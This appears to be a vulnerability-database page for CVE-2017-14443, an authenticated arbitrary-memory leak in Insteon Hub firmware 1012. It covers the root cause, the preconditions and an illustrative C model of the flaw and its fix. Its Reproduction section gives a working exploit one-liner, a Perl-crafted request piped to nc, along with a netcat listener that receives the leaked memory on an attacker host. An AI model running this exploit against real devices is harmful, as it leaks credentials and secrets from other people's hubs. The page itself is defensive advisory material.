CVE-2017-14443
Description
An exploitable information leak vulnerability exists in Insteon Hub running firmware version 1012. The HTTP server implementation incorrectly checks the number of GET parameters supplied, leading to an arbitrarily controlled information leak on the whole device memory. An attacker can send an authenticated HTTP request to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Insteon Hub firmware 1012 leaks arbitrary memory via HTTP GET requests with improperly checked parameter count, requiring authentication.
Vulnerability
The Insteon Hub (model 2245-222) running firmware version 1012 contains an information leak vulnerability in its HTTP server implementation. The server uses the HTTPServer task from Microchip's Libraries for Applications, which calls an HTTPExecuteGet function when handling HTTP GET requests. The function fails to correctly validate the number of GET parameters supplied, leading to an out-of-bounds read from the curHTTP structure (HTTP_CONN type). An attacker can trigger this bug via a specially crafted HTTP GET request that specifies an invalid number of parameters [1].
Exploitation
An attacker must have authenticated access to the Insteon Hub to send HTTP requests. The vulnerability is remotely exploitable over the network with low attack complexity (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:H); no interaction from a legitimate user is required. To exploit, the attacker sends an HTTP GET request with a manipulated number of parameters, causing the server to read beyond the bounds of the parameter array and leak arbitrary memory contents [1].
Impact
Successful exploitation results in an arbitrary memory leak from the target device. The attacker can read any portion of the device's memory, potentially exposing sensitive data such as credentials, configuration details, or other secrets stored in RAM. The CVSS score of 9.6 (critical) reflects high confidentiality and availability impact; the vector rates integrity impact as none. The leaked information may enable further attacks or unauthorized control of the hub [1].
Mitigation
As of the publication date of TALOS-2017-0492 (September 2018), no official patch or firmware update has been released to address this vulnerability in Insteon Hub firmware version 1012. Users are advised to restrict network access to the hub to trusted users only and monitor for any future firmware updates from Insteon. The Hub may be at end-of-life, and no fix is guaranteed [1].
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Range: =1012
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Uninitialized variable: the code reads GET parameter 4 from the stack without verifying it was parsed, allowing an attacker to control the pointer via request padding and leak arbitrary memory."
Attack vector
An attacker must first authenticate via HTTP Basic Authentication (the advisory notes that `HTTPExecuteGet` is only reached if a valid basic-auth string is provided). The attacker sends a crafted GET request with at least 3 parameters where parameter 3 is "1" and parameter 1 starts with "u" (e.g., "up_PLM"). Because the code checks only that there are at least 3 parameters (the check at [5] in the advisory's annotated listing) but then reads parameter 4 from the stack without initializing it, the fourth parameter pointer is uninitialized. By padding the HTTP request with extra bytes (68 bytes of 'A', the `"A"x68` in the PoC) and appending a controlled 4-byte address, the attacker can fill the uninitialized stack slot with a pointer to any memory location. The device then performs an outbound HTTP GET to the attacker-controlled host, leaking the NULL-terminated string at that address [1].
Affected code
The vulnerability resides in the `insteon_HTTPExecuteGet` function (at seg000:9D02C758) within the HTTPServer task of Microchip's "Libraries for Applications". The function calls `sub_9d043e0c` to parse GET parameters into a local array of pointers, then checks the parameter count at [5] and processes parameters at [6] and [7] (the bracketed numbers are the annotation markers in the advisory's disassembly listing). The flaw is that when fewer than 4 parameters are supplied, parameter 4 (`getparam_4`) is never initialized but is still used as the source argument to `strcpy` at [10], copying the target of an uninitialized pointer into the global update URL variable.
What the fix does
The advisory does not include a patch or describe a specific fix. The remediation guidance is implicit in the vulnerability description: the `insteon_HTTPExecuteGet` function must validate that all four GET parameters are actually present before dereferencing them. Specifically, the check at [5] (`sltiu $s2, 3`) only ensures at least 3 parameters exist, but the code at [10] uses parameter 4 without verifying it was parsed. A proper fix would either require exactly 4 parameters for this code path, or initialize all parameter pointers to NULL and reject the request when the required pointer is still NULL before it is dereferenced, preventing the uninitialized variable condition [CWE-457] [1].
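To make the root cause and the fix concrete, the following model is added here; it is example code written for this page, not the Insteon firmware or Talos's code. It reduces the handler to a four-slot parameter array: the vulnerable version keeps only the "at least 3" count check and copies `params[3]` into the update-URL global regardless, while the hardened version initializes every slot to NULL and refuses the path without a fourth parameter. Because a genuine uninitialized stack read is undefined behaviour and not reproducible, the `stale` argument is an assumption that stands in for the pointer the attacker planted through request padding; the function and variable names (`vulnerable_execute_get`, `fixed_execute_get`, `g_update_url`) are this example's, not the firmware's.

```c
#include <stdbool.h>
#include <stdio.h>
#include <string.h>

#define MAX_PARAMS 4
#define URL_MAX    64

/* Stand-in for the global update-URL variable that the strcpy at [10]
 * writes into (the name is this example's, not the firmware's). */
static char g_update_url[URL_MAX];

/* Split "a&b&c" on '&' into at most MAX_PARAMS pointers and return how
 * many were found.  Slots beyond the count are left untouched, which is
 * what makes the caller's bug possible. */
static int parse_get_params(char *query, char *params[MAX_PARAMS])
{
    int n = 0;
    for (char *tok = strtok(query, "&"); tok && n < MAX_PARAMS;
         tok = strtok(NULL, "&"))
        params[n++] = tok;
    return n;
}

/* Vulnerable model of insteon_HTTPExecuteGet.  Slots 0..2 are filled by
 * the parser; slot 3 is only set here to model stale stack contents, and
 * `stale` is the pointer the attacker planted via padding (a simulation
 * so that the behaviour is deterministic). */
static bool vulnerable_execute_get(const char *raw_query, const char *stale)
{
    char  query[128];
    char *params[MAX_PARAMS];
    params[3] = (char *)stale;          /* simulated stack residue */

    snprintf(query, sizeof query, "%s", raw_query);
    int n = parse_get_params(query, params);

    if (n < 3)                          /* the only count check: sltiu $s2, 3 */
        return false;
    if (params[0][0] != 'u' || strcmp(params[2], "1") != 0)
        return false;

    /* params[3] is dereferenced even when only three were parsed */
    snprintf(g_update_url, sizeof g_update_url, "%s", params[3]);
    return true;
}

/* Hardened version: every slot starts NULL and the path that needs a
 * fourth parameter refuses to run without one. */
static bool fixed_execute_get(const char *raw_query)
{
    char  query[128];
    char *params[MAX_PARAMS] = {0};

    snprintf(query, sizeof query, "%s", raw_query);
    int n = parse_get_params(query, params);

    if (n < MAX_PARAMS || params[3] == NULL)
        return false;
    if (params[0][0] != 'u' || strcmp(params[2], "1") != 0)
        return false;

    snprintf(g_update_url, sizeof g_update_url, "%s", params[3]);
    return true;
}

const char *update_url(void) { return g_update_url; }

int main(void)
{
    /* Constructed inputs: the PoC's query with its trailing '&' (three
     * parameters) and "600" standing in for the string at 0x9d061b30. */
    bool leaked = vulnerable_execute_get("up_PLM&10.0.0.5&1&", "600");
    printf("vulnerable: accepted=%d update_url=\"%s\"\n", leaked, update_url());

    bool accepted = fixed_execute_get("up_PLM&10.0.0.5&1&");
    printf("fixed (3 params): accepted=%d\n", accepted);
    return 0;
}
```

With the three-parameter query the vulnerable handler "succeeds" and the update URL becomes whatever the planted pointer addressed, which is exactly the string the hub later sends to the attacker's host; the hardened handler rejects the same request and only accepts one that actually carries a fourth parameter.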
Preconditions
- auth: Attacker must provide valid HTTP Basic Authentication credentials (the advisory states HTTPExecuteGet is only reached if a valid basic-auth string is provided)
- network: Attacker must have network access to the Insteon Hub on port 25105
- network: Attacker must control a server reachable by the device to receive the leaked data
- input: GET request must contain at least 3 parameters with specific values (parameter 3 = '1', parameter 1 starts with 'u')
Reproduction
The advisory provides a working PoC. The one-liner interpolates a Perl variable, `$sMyIP`, so set it to the attacker's listener IP inside the Perl code (or substitute the address literally), then run: `perl -e 'print "GET /x?up_PLM&${sMyIP}&1& HTTP/1.0\r\nAuthorization: Basic VXNlcm5hbWU6UGFzc3dvcmQ=\r\n" . "A"x68 . "\x30\xb1\x06\x9d" . "\r\n\r\n"' | nc $INSTEON_IP 25105`. Here `"A"x68` supplies the 68 bytes of padding and `"\x30\xb1\x06\x9d"` is the address 0x9d061b30 in little-endian byte order. Simultaneously listen on port 80 with `nc -l -p 80` (binding port 80 normally requires root). The device will connect back and send the string at address 0x9d061b30 (e.g., "600") in the HTTP request path [1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] www.talosintelligence.com/vulnerability_reports/TALOS-2017-0492 (MISC)
News mentions
No linked articles in our index yet.